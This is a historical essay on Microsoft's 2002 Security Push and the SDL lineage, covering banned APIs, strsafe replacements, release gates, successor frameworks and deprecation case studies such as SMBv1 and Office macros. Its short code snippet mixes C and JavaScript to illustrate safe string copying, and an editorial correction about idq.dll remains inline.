A C header authored at Microsoft during and after the Push that re-declares roughly forty unsafe C runtime functions (`strcpy`, `strcat`, `gets`, `sprintf`, `_snprintf`, `wcscpy`, `_mbscpy`, and more) as compile-time errors. The pattern is a `#pragma deprecated` plus a `#define` that expands to an undefined symbol, so any source file that includes `banned.h` and then calls a banned function fails to compile. The descendant in Microsoft&apos;s current Windows driver toolchain is the static-analyzer warning **C28719**, which release-gates Windows driver submissions to this day [@msft-c28719].

A safer-by-default replacement string-handling API set introduced by Microsoft alongside `banned.h`. The `Strsafe.h` header (and the Win32 reference page that still ships in Microsoft Learn) defines `StringCbCopy`, `StringCbCat`, `StringCbPrintf`, `StringCchCopy`, `StringCchCat`, `StringCchPrintf`, and their wide-character variants. Every function takes an explicit destination-buffer size and returns an `HRESULT` so the caller can detect truncation rather than overrun [@msft-strsafe]. The C11 `_s` family (`strcpy_s`, `strcat_s`, `sprintf_s`) is the standards-track parallel.

The release-blocking sign-off step at the end of the SDL pipeline. Before a product can ship, an FSR examines the threat model, the residual vulnerabilities, the banned-API audit results, the fuzz-test coverage, the static-analysis warnings, and the operational response plan, and decides whether the release meets the security bar. A failed FSR blocks the release. The FSR is the single component that converts every preceding &quot;should&quot; into a hard &quot;must&quot; -- it is where the advisory pipeline becomes the mandatory one [@lipner-acsac-2004] [@howard-lipner-sdl-book].
&lt;p&gt;Place the same banned-API substitution that every Windows engineer learned that spring next to its FSR-approved replacement, with the surviving 2026 compiler-enforced warning called out:&lt;/p&gt;
&lt;p&gt;{`
// BEFORE THE PUSH -- this compiles, and overflows if src is too long.
// C runtime; allowed in C89; the entire bug class behind Code Red et al.
void copyName_BANNED(char* dst, const char* src) {
  // strcpy(dst, src);
  // After banned.h is included, the above line FAILS TO COMPILE:
  //   error C4996: &apos;strcpy&apos;: This function or variable may be unsafe.
  //   error C28719: Banned API Usage: strcpy is a Banned API.
}&lt;/p&gt;
&lt;p&gt;// AFTER THE PUSH -- this is the FSR-approved replacement.
// strsafe.h, mandatory after February 2002 for Windows code.
// Microsoft&apos;s C28719 still release-gates Windows drivers in 2026.
function copyName_OK(dst, dstSize, src) {
  // StringCbCopy(dst, dstSize, src);
  // Returns S_OK on success, STRSAFE_E_INSUFFICIENT_BUFFER on truncation.
  // The compiler knows dstSize; the static analyzer can prove the bound.
  console.log(&apos;FSR-approved: explicit destination size, returns HRESULT.&apos;);
}&lt;/p&gt;
&lt;p&gt;copyName_OK(&apos;buffer&apos;, 16, &apos;David Cutler&apos;);
`}&lt;/p&gt;
&lt;p&gt;The substitution is the entire engineering theme of the Push in one line. &lt;code&gt;strcpy(dst, src)&lt;/code&gt; is undecidable in the general case: you cannot prove from the call site that &lt;code&gt;src&lt;/code&gt; fits in &lt;code&gt;dst&lt;/code&gt; without information the call site does not have. &lt;code&gt;StringCbCopy(dst, dstSize, src)&lt;/code&gt; is mechanically checkable: the destination size is explicit, the function returns truncation as a recoverable error, and a static analyzer can verify the bound at every call site. The class of bugs behind Code Red did not become &lt;em&gt;easier&lt;/em&gt; to write; it became &lt;em&gt;uncompilable&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The state change is best shown as a comparison table:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Discipline component&lt;/th&gt;
&lt;th&gt;Pre-Push state&lt;/th&gt;
&lt;th&gt;Post-Push state&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Training&lt;/td&gt;
&lt;td&gt;Opt-in; not all engineers attended&lt;/td&gt;
&lt;td&gt;Mandatory across the Windows Division [@howard-lipner-push-2003]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Threat modeling&lt;/td&gt;
&lt;td&gt;Per-team optional&lt;/td&gt;
&lt;td&gt;Per-component mandatory; STRIDE-driven [@howard-lipner-push-2003]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Banned-API enforcement&lt;/td&gt;
&lt;td&gt;Recommended in the SWI guidance&lt;/td&gt;
&lt;td&gt;Compile-time error via &lt;code&gt;banned.h&lt;/code&gt;; replacement via &lt;code&gt;strsafe.h&lt;/code&gt; [@msft-strsafe] [@msft-c28719]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Code review&lt;/td&gt;
&lt;td&gt;Voluntary&lt;/td&gt;
&lt;td&gt;Release-gate via Final Security Review [@lipner-acsac-2004]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Authority&lt;/td&gt;
&lt;td&gt;Advisory (SWI could recommend)&lt;/td&gt;
&lt;td&gt;Release-blocking (FSR could block) [@lipner-acsac-2004]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Measurable outcome&lt;/td&gt;
&lt;td&gt;None published&lt;/td&gt;
&lt;td&gt;~50% reduction in publicly reported vulnerabilities, WS2003 vs Win2000 [@howard-lipner-push-2003]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The right-hand column is, line by line, the same activities the left-hand column lists. Training is training. Threat modeling is threat modeling. The banned-API list is the same list LeBlanc and Howard had been publishing for years. Static analysis is static analysis. What changed in every row is the verb: from &quot;may,&quot; &quot;should,&quot; and &quot;recommended&quot; to &quot;must,&quot; &quot;shall,&quot; and &quot;release-blocking.&quot;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The breakthrough was organizational, not technical. The Push used the same training material, the same banned-API list, the same threat-modeling framework, and the same code-review checklist that SWI, Howard, LeBlanc, and Schneier had been writing for two years. What changed was the signoff power. Training became mandatory; threat modeling became per-component-mandatory; banned APIs became compile-time errors; code review became a release gate; and the Final Security Review acquired the authority to block a ship date. The Push did not invent new methods. It gave the existing methods executive authority.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Same checklists, different signoff power. That single sentence is the unit of work the Push did. Every other secure-development framework on the industry shelf in 2026 is, organizationally, a restatement of that unit at different scales: BSIMM observes how vendors did it, OWASP SAMM prescribes how to do it, NIST SSDF mandates it for U.S. federal suppliers, ISO/IEC 27034 makes it certifiable. The technology was downstream of the authority [@bsimm-home] [@owasp-samm-model] [@nist-ssdf-218] [@iso-27034-1].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Ten weeks of training is one event. A discipline is a &lt;em&gt;repeatable&lt;/em&gt; event. The Push needed to be codified into something a product team could &lt;em&gt;do&lt;/em&gt; on every release.&lt;/p&gt;
&lt;h2&gt;8. What the Discipline Became: The SDL Lineage (2002-2006)&lt;/h2&gt;
&lt;p&gt;Codification ran in two steps.&lt;/p&gt;
&lt;p&gt;The first step was Steve Lipner&apos;s ACSAC 2004 paper, &quot;The Trustworthy Computing Security Development Lifecycle,&quot; the first formal &lt;em&gt;external&lt;/em&gt; description of the SDL as a multi-phase release-engineering process [@lipner-acsac-2004]. ACSAC is a peer-reviewed venue with a security-practitioner audience; the paper put the program on the academic record and started the citation chain.&lt;/p&gt;
&lt;p&gt;The second step was the book. Howard and Lipner, &lt;em&gt;The Security Development Lifecycle&lt;/em&gt;, Microsoft Press 2006 (ISBN 978-0-7356-2214-2) [@howard-lipner-sdl-book]. The book documents every phase, every checklist, every threat-modeling template, every banned-API entry, every FSR criterion. It is what made the methodology &lt;em&gt;exportable&lt;/em&gt;: an organization not named Microsoft could pick up the book and run an SDL-shape program of its own.&lt;/p&gt;

A software-engineering process model that integrates security activities into every phase of a product release. The canonical Microsoft formulation, in the 2006 Howard and Lipner book, is a seven-phase pipeline: Training, Requirements, Design (with mandatory STRIDE threat modeling), Implementation (with banned-API enforcement and mandatory static analysis), Verification (fuzz testing and dynamic analysis), Release (Final Security Review and a signed-off response plan), and Response (feeds back into MSRC). The current Microsoft public formulation organizes the same activities as 10 practices spanning 5 lifecycle stages: Design, Code, Build and Deploy, Run, and Zero Trust governance [@msft-sdl-practices] [@msft-sdl-overview].
&lt;p&gt;The SDL phase pipeline in its canonical 2006 form:&lt;/p&gt;

flowchart LR
    A[Training] --&amp;gt; B[Requirements]
    B --&amp;gt; C[Design: STRIDE threat modeling]
    C --&amp;gt; D[Implementation: banned-API + static analysis]
    D --&amp;gt; E[Verification: fuzz + dynamic analysis]
    E --&amp;gt; F[Release: Final Security Review]
    F --&amp;gt; G[Response: MSRC]
    G -.feedback.-&amp;gt; A
&lt;p&gt;The current Microsoft SDL has shifted with the industry. The 2026 public formulation organizes the same activities as ten practices spanning five lifecycle stages: Design, Code, Build and Deploy, Run, and Zero Trust governance [@msft-sdl-practices] [@msft-sdl-overview]. Practices 1, 3, and 10 (security standards, threat modeling, training) map directly back to the 2002 Push and the 2006 book. Practices 2 and 4 (proven security features and cryptography standards) became prominent after the 2014-2017 TLS-bug wave: Heartbleed in April 2014 [@nvd-cve-2014-0160-heartbleed], POODLE in October 2014, Logjam in May 2015, ROBOT in December 2017. Practices 5 through 9 (supply chain, engineering environment, security testing, operational platform, monitoring and response) absorb post-SolarWinds (December 2020), Log4Shell (December 2021), and xz-utils (March 2024) lessons that did not exist in the original 2006 codification [@cisa-secure-by-design] [@slsa-home] [@freund-xz-disclosure].&lt;/p&gt;
&lt;p&gt;The SDL did not invent training, did not invent threat modeling, did not invent banned APIs, and did not invent audit-driven review. What it did was &lt;em&gt;assemble&lt;/em&gt; them, &lt;em&gt;mandate&lt;/em&gt; them, and &lt;em&gt;gate releases&lt;/em&gt; on them at a scale and authority no one had previously attempted at a desktop-monopoly vendor. Saltzer and Schroeder (1975), OpenBSD (1996), CERT/CC (1988), Schneier (1999), Kohnfelder and Garg (1999), and Howard and LeBlanc (2001) all contributed substrate; the SDL was an organizational achievement that depended on every one of those.&lt;/p&gt;

Two people deserve named credit for the SDL surviving past its 2002 birth. Scott Charney, joining Microsoft in March 2002 as Chief Security Strategist, ran the Trustworthy Computing organization for thirteen years and kept the program funded, staffed, and politically supported through three Windows releases (XP SP2 in 2004, Vista in 2006, Windows 7 in 2009). Steve Lipner became the program&apos;s external voice -- the IEEE *Security and Privacy* paper, the ACSAC paper, the Microsoft Press book, and the conference circuit that turned an internal-Microsoft methodology into an industry-wide practice. The historical credit for &quot;founding&quot; goes to Gates; the historical credit for *sustaining* goes to Charney and Lipner.
&lt;p&gt;A discipline becomes industry-standard when other organizations adopt or are compelled to adopt it. What happened to the SDL&apos;s template between 2006 and 2026?&lt;/p&gt;
&lt;h2&gt;9. What the Era Taught the Next 25 Years&lt;/h2&gt;
&lt;p&gt;Every major secure-development framework published since 2006 traces a recognizable lineage back to the same Push-shape ancestor. The genealogy fans out:&lt;/p&gt;

flowchart TD
    P0[2002 Windows Security Push] --&amp;gt; M1[2004 Microsoft SDL Lipner ACSAC]
    M1 --&amp;gt; B[2008 BSIMM descriptive 128 activities]
    M1 --&amp;gt; S[2009 OWASP SAMM prescriptive 15 practices]
    M1 --&amp;gt; I[2011 ISO/IEC 27034 certifiable]
    M1 --&amp;gt; F[2018 SAFECode Fundamental Practices 3rd ed]
    M1 --&amp;gt; N[2022 NIST SSDF SP 800-218 federal-supplier]
    M1 --&amp;gt; L[2021-2023 SLSA Build track post-SolarWinds]
    M1 --&amp;gt; C[2023 CISA Secure by Design + Pledge]
&lt;p&gt;The shorthand for each descendant:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Microsoft SDL.&lt;/strong&gt; The 2004 ACSAC paper and the 2006 book; today&apos;s ten-practice five-stage formulation [@lipner-acsac-2004] [@msft-sdl-practices].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;BSIMM.&lt;/strong&gt; The Building Security In Maturity Model, descriptive (not prescriptive): 128 activities observed across 111 organizations in 8 industries, grouped into 12 practices in 4 domains [@bsimm-home].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;OWASP SAMM v2.&lt;/strong&gt; Open Software Assurance Maturity Model, prescriptive: 15 security practices grouped into 5 business functions (Governance, Design, Implementation, Verification, Operations), with 3 maturity levels per practice [@owasp-samm-model] [@owasp-samm-about].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ISO/IEC 27034-1:2011.&lt;/strong&gt; The first internationally certifiable application-security standard, confirmed in 2022 [@iso-27034-1].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SAFECode Fundamental Practices, 3rd ed.&lt;/strong&gt; A community-curated practice catalog from the Software Assurance Forum for Excellence in Code, with an explicit smallest-organization onramp [@safecode-fundamental-practices].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;NIST SP 800-218 (SSDF).&lt;/strong&gt; The Secure Software Development Framework, February 2022; legally voluntary in form but de-facto mandatory for U.S. federal suppliers via Executive Order 14028 and OMB Memorandum M-22-18 [@nist-ssdf-218].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SLSA v1.0.&lt;/strong&gt; Supply-chain Levels for Software Artifacts, the post-SolarWinds extension that adds build-integrity attestation to the SDL pattern [@slsa-v1-levels] [@slsa-home].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CISA Secure by Design and the Secure-by-Design Pledge.&lt;/strong&gt; A U.S. federal policy framework restating the SDL principles as expectations on commercial software vendors; the Pledge is voluntary and not legally binding [@cisa-secure-by-design] [@cisa-sbd-pledge].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below the family tree, every organization that picks one of these frameworks is also making a context-specific decision. A 2026 decision guide -- drawn from the SOTA work -- looks like this:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Situation&lt;/th&gt;
&lt;th&gt;Primary framework&lt;/th&gt;
&lt;th&gt;Threat modeling&lt;/th&gt;
&lt;th&gt;Supply chain&lt;/th&gt;
&lt;th&gt;Memory safety&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Large proprietary vendor&lt;/td&gt;
&lt;td&gt;Microsoft SDL [@msft-sdl-practices]&lt;/td&gt;
&lt;td&gt;STRIDE in Microsoft TM Tool [@msft-threat-modeling-tool]&lt;/td&gt;
&lt;td&gt;SLSA Build L3 [@slsa-v1-levels]&lt;/td&gt;
&lt;td&gt;Rust in new components [@weston-bluehat-il-2023] [@cisa-memory-safe-roadmaps]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;U.S. federal supplier&lt;/td&gt;
&lt;td&gt;NIST SSDF + Secure by Design [@nist-ssdf-218] [@cisa-secure-by-design]&lt;/td&gt;
&lt;td&gt;Manifesto-aligned [@threat-modeling-manifesto]&lt;/td&gt;
&lt;td&gt;SLSA Build L2+ [@slsa-v1-levels]&lt;/td&gt;
&lt;td&gt;CISA memory-safe roadmap [@cisa-memory-safe-roadmaps]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mid-size SaaS&lt;/td&gt;
&lt;td&gt;OWASP SAMM [@owasp-samm-model]&lt;/td&gt;
&lt;td&gt;OWASP Threat Dragon [@owasp-threat-dragon]&lt;/td&gt;
&lt;td&gt;SLSA Build L1 [@slsa-v1-levels]&lt;/td&gt;
&lt;td&gt;Language choice per service&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Open-source project&lt;/td&gt;
&lt;td&gt;SAFECode + SLSA [@safecode-fundamental-practices] [@slsa-home]&lt;/td&gt;
&lt;td&gt;STRIDE or LINDDUN&lt;/td&gt;
&lt;td&gt;SLSA Build L1 + provenance&lt;/td&gt;
&lt;td&gt;Language choice per project&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privacy-critical&lt;/td&gt;
&lt;td&gt;LINDDUN&lt;/td&gt;
&lt;td&gt;LINDDUN + DPIA&lt;/td&gt;
&lt;td&gt;per regulator&lt;/td&gt;
&lt;td&gt;per language toolchain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI/LLM-integrated&lt;/td&gt;
&lt;td&gt;NIST AI RMF + OWASP LLM Top 10 [@nist-ai-rmf] [@owasp-llm-top-10]&lt;/td&gt;
&lt;td&gt;LLM Top 10 categories&lt;/td&gt;
&lt;td&gt;per model supply chain&lt;/td&gt;
&lt;td&gt;per language toolchain&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The table is a snapshot, not a prescription; the underlying point is that every cell is a child of the same 2002 organizational pattern, specialized to a population.&lt;/p&gt;
&lt;h3&gt;The five-stage cohort-migration playbook&lt;/h3&gt;
&lt;p&gt;Every meaningful security improvement since 2002 has had to walk a population through the same five-stage migration without breaking the legitimate-use long tail. The stages, drawn directly from how Microsoft has operated and what the larger industry has copied:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Ship telemetry first.&lt;/strong&gt; Before flipping any default, instrument the current behavior so you know who is using it, how, and how often.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Publish guidance naming the unsafe path as exceptional.&lt;/strong&gt; Documentation calls the behavior &quot;supported but deprecated&quot;; the change is announced.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flip the default behind documented escape hatches.&lt;/strong&gt; The new default is safe; users with a legitimate need can still opt back in via Group Policy, a registry key, an unblock checkbox, or an admin command.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deprecate on a published schedule.&lt;/strong&gt; Telemetry says the long tail is small enough to commit to a removal date; the date is announced one or more years out.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Remove the capability.&lt;/strong&gt; The feature is no longer present; the escape hatch is no longer reachable.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Two worked examples make the playbook concrete -- the Office VBA macro block of 2022 and the SMBv1 deprecation of 1996-2017.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Office VBA macros from the internet (announced February 2022).&lt;/strong&gt; Microsoft committed to blocking VBA macros in Office documents that arrived from the internet (carrying the Mark of the Web). The five-channel rollout, as documented and re-documented on the current Microsoft Learn page, ran:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Channel&lt;/th&gt;
&lt;th&gt;Default-block date&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Current Channel Preview 2203&lt;/td&gt;
&lt;td&gt;April 12, 2022&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Current Channel 2206&lt;/td&gt;
&lt;td&gt;July 27, 2022 (after a July 2022 pause-and-resume)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monthly Enterprise 2208&lt;/td&gt;
&lt;td&gt;October 11, 2022&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Semi-Annual Enterprise (Preview) 2208&lt;/td&gt;
&lt;td&gt;October 11, 2022&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Semi-Annual Enterprise 2208&lt;/td&gt;
&lt;td&gt;January 10, 2023&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;[@ms-learn-internet-macros-blocked]&lt;/p&gt;
&lt;p&gt;The escape hatches were explicit: per-document Unblock from the file&apos;s Properties dialog, configured Trusted Locations, signed-by-Trusted-Publishers, or Group Policy overrides for managed environments [@ms-learn-internet-macros-blocked]. The capability was not removed -- the playbook stopped at stage 3. The July 2022 pause-and-resume is the playbook&apos;s self-correcting feedback loop in action: Microsoft paused the Current Channel rollout in response to deployment-side issues, fixed them, and resumed [@ms-learn-internet-macros-blocked]. That this fix took &lt;strong&gt;twenty-seven years&lt;/strong&gt; from Concept&apos;s 1995 first detection to the Office VBA macro block of February 2022 is the era&apos;s tax for cohort migration without breaking the legitimate-use long tail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/the-connection-that-refused-to-downgrade-twenty-five-years-o/&quot; rel=&quot;noopener&quot;&gt;SMBv1&lt;/a&gt; deprecation (1996 to 2025).&lt;/strong&gt; Server Message Block version 1 shipped in 1996. Microsoft publicly deprecated SMBv1 in 2014 (the long tail was many years of legacy installations). Ned Pyle, Principal Program Manager for Microsoft&apos;s Storage and File Services team, published the canonical &quot;Stop using SMB1&quot; Tech Community post on September 16, 2016 [@pyle-stop-using-smb1]. May and June 2017 brought the empirical forcing function: the WannaCry ransomware in May, the NotPetya wiper in June, both exploiting EternalBlue against SMBv1. October 2017&apos;s Windows 10 version 1709 shipped SMBv1 off by default. Windows Server 2019 and later, plus Windows 11, do not install SMBv1 at all. For Windows Home and Pro, the SMBv1 client auto-uninstalls after 15 days of non-use [@ms-learn-smbv1-not-installed]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1996&lt;/td&gt;
&lt;td&gt;SMBv1 ships with Windows NT 4.0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2014&lt;/td&gt;
&lt;td&gt;Public deprecation announced&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;September 16, 2016&lt;/td&gt;
&lt;td&gt;Ned Pyle&apos;s &quot;Stop using SMB1&quot; Tech Community post [@pyle-stop-using-smb1]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;May-June 2017&lt;/td&gt;
&lt;td&gt;WannaCry and NotPetya empirical forcing function&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;October 2017 (1709)&lt;/td&gt;
&lt;td&gt;SMBv1 default-off in Windows 10&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Server 2019+, Windows 11&lt;/td&gt;
&lt;td&gt;Not installed by default; 15-day auto-uninstall on Home/Pro [@ms-learn-smbv1-not-installed]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &quot;Deprecation takes a decade&quot; is not vendor inefficiency. It is the cost of executing each playbook stage without breaking the legitimate-use long tail of business-critical software that depends on the capability. An empirical forcing function -- a worm, a ransomware wave, a public catastrophe -- is what compresses the late stages from years to months. WannaCry and NotPetya did to SMBv1 in 2017 what Code Red and Nimda did to the Windows defaults in 2002.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The aggregate catalog of unsafe defaults the era&apos;s lessons forced into the playbook, each at its own stage in 2026:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;NetBIOS over TCP exposed by default (deprecated; off by default).&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM&lt;/a&gt; as a first-class protocol (Microsoft announced default-off deprecation in October 2023, with a rolling transition through Windows Server 2025 and later releases [@techcommunity-ntlm-evolution-2023]).&lt;/li&gt;
&lt;li&gt;ActiveX by default in the IE Internet zone (removed with IE retirement in 2022).&lt;/li&gt;
&lt;li&gt;Autorun on removable media (default-off after Windows 7 patch in February 2011 [@kb971029-autorun-wayback]).&lt;/li&gt;
&lt;li&gt;Office macros enabled by default (default-block for internet-marked files since 2022 [@ms-learn-internet-macros-blocked]).&lt;/li&gt;
&lt;li&gt;PowerShell v2 (deprecated 2017, removed by default in Windows 11 23H2 [@devblogs-powershell-v2-deprecation]).&lt;/li&gt;
&lt;li&gt;Office Equation Editor (deprecated 2017, removed 2018 after CVE-2017-11882 [@nvd-cve-2017-11882]).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The 2002 template won. The modern industry runs on its descendants. But &quot;won&quot; does not mean &quot;solved&quot; -- the same eight-engineer SWI of 2000 has descendants in 2026 that still ship the same memory-safety bugs Cutler&apos;s NT kernel shipped in 1993. What changed? What did not?&lt;/p&gt;
&lt;h2&gt;10. State of the Art (and the Wars Ahead)&lt;/h2&gt;
&lt;p&gt;Open with the humility. Microsoft&apos;s own 2019 MSRC retrospective is the figure CISA preserves verbatim: &lt;strong&gt;&quot;approximately 70% of the vulnerabilities Microsoft assigns a CVE each year continue to be memory safety issues&quot;&lt;/strong&gt; [@cisa-urgent-need-memory-safety] [@cisa-memory-safe-roadmaps].&lt;/p&gt;
&lt;p&gt;Twenty-five years after the SDL&apos;s birth, the dominant CVE class is the same one the NT 3.1 -&amp;gt; NT 4.0 -&amp;gt; IIS 5.0 series shipped throughout the 1990s and Code Red weaponized in 2001.An earlier draft credited Cutler&apos;s NT-kernel team with shipping &lt;code&gt;idq.dll&lt;/code&gt; in 1993. That attribution is wrong on both counts. &lt;code&gt;idq.dll&lt;/code&gt; first shipped with &lt;strong&gt;Microsoft Index Server 1.0 for Windows NT 4.0 in 1996&lt;/strong&gt;, and it was authored by the Index Server / IIS-ISAPI team, not the Cutler-led NT-kernel team. The load-bearing claim -- that the dominant CVE class today is the same memory-safety class the NT-line products shipped throughout the 1990s and Code Red weaponized in 2001 -- is preserved without the inaccurate attribution. The discipline the era forced was necessary; it was not sufficient.&lt;/p&gt;
&lt;p&gt;Three frontiers carry that residual problem forward into the next decade.&lt;/p&gt;
&lt;h3&gt;Frontier 1: supply-chain integrity (SLSA v1.0 Build track levels)&lt;/h3&gt;
&lt;p&gt;SLSA -- Supply-chain Levels for Software Artifacts -- is the post-SolarWinds extension of the SDL pattern to the build pipeline itself. The v1.0 specification defines four Build track levels, with verbatim per-level guarantees [@slsa-v1-levels]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Build L0.&lt;/strong&gt; No SLSA. No claims about provenance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Build L1.&lt;/strong&gt; &quot;Provenance showing how the package was built.&quot; Crucially, the spec is explicit that at L1 &quot;provenance may be incomplete and/or unsigned&quot; -- L1 defends against mistakes and gives consumers something to inspect, not against tampering [@slsa-v1-levels].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Build L2.&lt;/strong&gt; Signed provenance, &quot;generated by a hosted build platform.&quot; The signature belongs to the build platform, not the producer -- specifically, &quot;by a key that is only accessible to the build platform&quot; -- so post-build tampering by the producer is detectable [@slsa-v1-levels].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Build L3.&lt;/strong&gt; Hardened build platform: builds run in isolation so one build cannot influence another, and the signing key is &quot;not accessible to user-defined build steps&quot; so an insider with a malicious build script cannot forge signed provenance [@slsa-v1-levels].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A Source track existed in SLSA&apos;s v0.1 draft and was explicitly &lt;em&gt;deferred&lt;/em&gt; from v1.0. The future-directions page is direct about why: &quot;A Source track could provide protection against tampering of the source code prior to the build&quot; [@slsa-future-directions]. The reason it is not in v1.0: there is no automatic decision procedure that distinguishes a malicious-but-syntactically-clean patch from a benign one.&lt;/p&gt;
&lt;p&gt;The xz-utils CVE-2024-3094 attack is the canonical case. Andres Freund&apos;s March 29, 2024 oss-security disclosure described a multi-year campaign by an attacker using the handle &quot;Jia Tan&quot; who, over two and a half years (the first patch landed in October 2021), built a maintainer-grade reputation and pushed a backdoor into the xz release tarballs that diverged subtly from the git source [@freund-xz-disclosure]. Russ Cox&apos;s timeline reconstructs the social-engineering chain: the &quot;Jigar Kumar&quot; and &quot;Dennis Ens&quot; sockpuppet accounts pressuring the original maintainer to delegate authority, the gradual accretion of commit access, the backdoor delivered in the release artifacts but not the git history [@cox-xz-timeline].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; SLSA&apos;s Build track addresses the integrity of the path from source to artifact. It does not address the integrity of the source itself. A malicious patch that lands in the upstream repository and is built by an SLSA Build L3 platform produces a properly attested, properly signed artifact that is malicious. The xz-utils case is the existence proof. Detection here still depends on individual engineer-curiosity in the field -- Andres Freund noticed an anomalous CPU spike on his Debian sid SSH logins and chased it -- not on any mechanically verifiable property of the supply chain.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Frontier 2: AI/LLM-integrated software&lt;/h3&gt;
&lt;p&gt;The threat-modeling frameworks the SDL absorbed -- STRIDE, PASTA, LINDDUN -- were designed for systems whose components have specifications. An LLM is not such a component. Its behavior is an empirical artifact of its training data and the prompt context it receives; there is no spec a verifier can use to bound the set of outputs the model will produce for a given input.&lt;/p&gt;
&lt;p&gt;The partial responses on the table in 2026: the NIST AI Risk Management Framework (AI RMF 1.0), released January 26, 2023 [@nist-ai-rmf]; the OWASP Top 10 for Large Language Model Applications, now part of the OWASP GenAI Security Project [@owasp-llm-top-10]; and the draft &lt;strong&gt;NIST SP 800-218A IPD&lt;/strong&gt; (&quot;Secure Software Development Practices for Generative AI and Dual-Use Foundation Models&quot;), published April 29, 2024, by Souppaya, Vassilev, Ogata, Stanley, and Scarfone as an SSDF Community Profile mandated by Executive Order 14110 section 4.1(a)(ii) of October 30, 2023 [@nist-sp-800-218a-ipd] [@nist-sp-800-218a-ipd-pdf].&lt;/p&gt;
